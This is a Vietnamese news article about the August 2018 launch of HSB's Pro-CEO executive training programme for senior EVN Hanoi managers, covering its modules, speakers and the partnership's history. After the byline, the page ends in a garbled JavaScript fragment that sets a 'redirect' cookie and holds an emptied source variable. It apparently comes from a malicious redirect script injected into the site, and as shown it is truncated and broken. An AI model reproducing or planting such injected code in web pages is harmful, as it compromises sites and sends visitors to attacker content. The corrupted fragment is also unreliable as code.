HSB-EVN proCEO-08.2018 4Đây là chương trình được thiết kế với nhiều phương pháp học tập độc đáo, trong đó có nhiều sự khác biệt mang tính vượt trội như phương pháp Hollywood Teaching Plan” và triết lý đào tạo TWO-C Games.

Ngày 10/8/2018, Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN đã khai giảng khóa đào tạo “Giám đốc điều hành chuyên nghiệp” Pro-CEO dành cho cán bộ quản lý cấp cao của TCT Điện lực TP.Hà Nội. Chương trình đào tạo diễn ra từ ngày 10/08 đến hết ngày 22/09/2018 và được chia thành 5 đợt học.

Tham dự lễ khai giảng, về phía TCT Điện lực TP.Hà Nội có ông Nguyễn Anh Tuấn – Tổng Giám đốc, ông Nguyễn Anh Tuấn – Phó Tổng Giám đốc, ông Nguyễn Việt Hà – Phó Ban Tổ chức Nhân sự.
Về phía khoa Quản trị và Kinh doanh có sự tham dự của PGS.TS Hoàng Đình Phi – Chủ nhiệm Khoa, PGS.TS Nguyễn Ngọc Thắng – Phó Chủ nhiệm Khoa.

 HSB-EVN proCEO-08.2018 2

PGS.TS Hoàng Đình Phi trân trọng cảm ơn sự tin tưởng của Ban lãnh đạo TCT Điện lực TP.Hà Nội dành cho HSB khi tổ chức các chương trình đào tạo chất lượng cao.

Phát biểu tại lễ khai giảng, ông Nguyễn Anh Tuấn – Tổng Giám đốc TCT Điện lực TP.Hà Nội cho biết: “Đây là chương trình đào tạo trọng tâm của EVN HANOI phối hợp tổ chức cùng Khoa Quản trị và Kinh doanh, với kỳ vọng mang đến cho đội ngũ cán bộ quản lý cấp cao của TCT Điện lực TP.Hà Nội một cái nhìn mới, một ngôn ngữ mới của xu thế quản trị hiện đại. Do vậy, EVN HANOI tạo điều kiện hết sức về vật chất và thời gian để các đồng chí học viên dành trọn tâm huyết cho khóa đào tạo. Đây cũng là chương trình đánh dấu bước phát triển cao hơn trong quan hệ hợp tác đào tạo giữa EVN HANOI và Khoa Quản trị và Kinh doanh – ĐHQGHN”.

HSB-EVN proCEO-08.2018 4

Ông Nguyễn Anh Tuấn – Tổng Giám đốc TCT Điện lực TP.Hà Nội đánh giá cao Chương trình Pro-CEO do HSB thiết kế dành riêng cho cán bộ quản lý cấp cao của EVN HANOI

Đặc biệt, chương trình đào tạo “Giám đốc điều hành chuyên nghiệp” Pro-CEO đã mời các giảng viên, chuyên gia hàng đầu trong các lĩnh vực tới chia sẻ những tri thức và kinh nghiệm thực tế, như: Ông Nguyễn Hữu Thái Hòa – Giám đốc chiến lược Tập đoàn VNPT, Giám đốc Trung tâm Khoa học tư duy (CTS – Bộ Khoa học và công nghệ), cựu Giám đốc Chiến lược của FPT; PGS.TS. Hoàng Đình Phi – Nhà sáng lập kiêm Chủ tịch Tập đoàn Sannam, Chủ nhiệm Khoa Quản trị và Kinh doanh – ĐHQGHN; GS.TS.Nguyễn Thái Yên Hương – Phó Giám đốc Học viện Ngoại giao; TS.Phạm Đình Đoàn – Chủ tịch tập đoàn Phú Thái, Phó Chủ tịch Hội đồng Trung ương các Hiệp hội doanh nghiệp VN…

“Pro-CEO” được thiết kế bao gồm 7 chuyên đề:

Chuyên đề 1: CEO với hoạch định và quản trị chiến lược

Chuyên đề 2: Quản trị tài chính doanh nghiệp

Chuyên đề 3: Quản trị rủi ro trong kinh doanh

Chuyên đề 4: Quản trị công nghệ và phát triển doanh nghiệp trong thời đại số

Chuyên đề 5: Quản trị chất lượng nguồn nhân lực

Chuyên đề 6: Lãnh đạo và quản trị nhân tài

Chuyên đề 7: Văn hóa doanh nghiệp và xây dựng hình ảnh CEO chuyên nghiệp

Trong chương trình cũng có 2 buổi workshop với nội dung chia sẻ đến từ Ban lãnh đạo của TCT Điện lực TP.Hà Nội.

Điểm nhấn của chương trình việc các học viên sẽ được chia nhóm, cùng nhau tìm hiểu, nghiên cứu và xây dựng chương trình hành động của nhóm. Chương trình hành động sẽ được báo cáo trước Hội đồng chuyên gia HSB và lãnh đạo EVN HANOI vào ngày 22/9/2018.

HSB-EVN proCEO-08.2018 1

Pro-CEO được thiết kế với nhiều phương pháp học tập độc đáo, trong đó có nhiều sự khác biệt mang tính vượt trội như phương pháp Hollywood Teaching Plan và triết lý đào tạo TWO – C Games.

Theo đó, học viên được tiếp cận với phương pháp giảng dạy tiên tiến, kết hợp đa dạng và phong phú các hình thức học tập như: bài giảng trên lớp, thảo luận nhóm, thuyết trình, phân tích case study, thực hành phân vai – đóng vai, video clip mô phỏng thực tế môi trường kinh doanh tại Việt Nam và Quốc tế. Lớp học luôn có các nhóm để tạo ra không khí cạnh tranh trong giờ học. Do vậy, mỗi giờ học mỗi nhóm đều có nhiệm vụ phải hoàn thành giúp cho việc hợp tác giữa các thành viên trong nhóm và duy trì sự cạnh tranh giữa các nhóm. Phương pháp học tập hiện đại, độc đáo đã mang đến cho các anh chị học viên những cảm nhận khác biệt về giá trị của chương trình đào tạo tại Khoa Quản trị và Kinh doanh.

HSB-EVN proCEO-08.2018 5Ban lãnh đạo EVN HANOI và Khoa Quản trị & Kinh doanh chụp ảnh lưu niệm cùng các anh/chị học viên

Tổng công ty Điện lực TP.Hà Nội là đối tác chiến lược của Khoa Quản trị và Kinh doanh trong việc tổ chức các chương trình đào tạo về quản trị liên ngành. Từ năm 2012, hai bên đã phối hợp tổ chức nhiều chương trình đào tạo, trong đó có những chương trình nổi bật như: Chương trình đào tạo “Quản trị doanh nghiệp cơ bản” Pre MBA dành cho 400 cán bộ quản lý cấp 4 của EVN HANOI diễn ra từ năm 2016 đến tháng 4/2018; Chương trình đào tạo “Quản trị doanh nghiệp” MiniMBA dành cho đội ngũ cán bộ thuộc diện quy hoạch các chức danh cán bộ quản lý cấp 3 và cán bộ quản lý cấp 3 với sự tham gia của 44 học viên; Các chương trình hội thảo với chủ đề “Cách mạng công nghiệp 4.0 – Cơ hội và thách thức đối với EVN HANOI” được tổ chức cho Đoàn Thanh niên EVN HANOI. Chương trình bồi dưỡng với chủ đề “Cách mạng công nghiệp 4.0” và “Xây dựng tổ chức học tập tại EVN HANOI” dành cho cán bộ quản lý của các Ban/Trung tâm và các Công ty thành viên, Trưởng/phó phòng Tổ chức & Nhân sự, chuyên viên làm công tác đào tạo và công tác văn hóa doanh nghiệp; Chương trình đào tạo “Quản trị nguồn nhân lực” được thiết kế và triển khai dành cho đối tượng học viên là các cán bộ trực tiếp triển khai công tác đào tạo và nhân sự tại các đơn vị của EVN HANOI.

Không chỉ hợp tác trong lĩnh vực đào tạo, HSB và EVN HANOI còn hợp tác trên các lĩnh vực về công tác xã hội. Cụ thể 2 đơn vị đã phối hợp cùng tổ chức các chương trình thiện nguyện tại các bệnh viện nhằm giúp đỡ những em nhỏ có hoàn cảnh khó khăn mắc bệnh hiểm nghèo trên địa bản thành phố Hà Nội như Viện Bỏng Quốc gia, Viện K cơ sở Tân Triều, Bệnh viện Nhi Trung ương…

Nguyên Minh

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}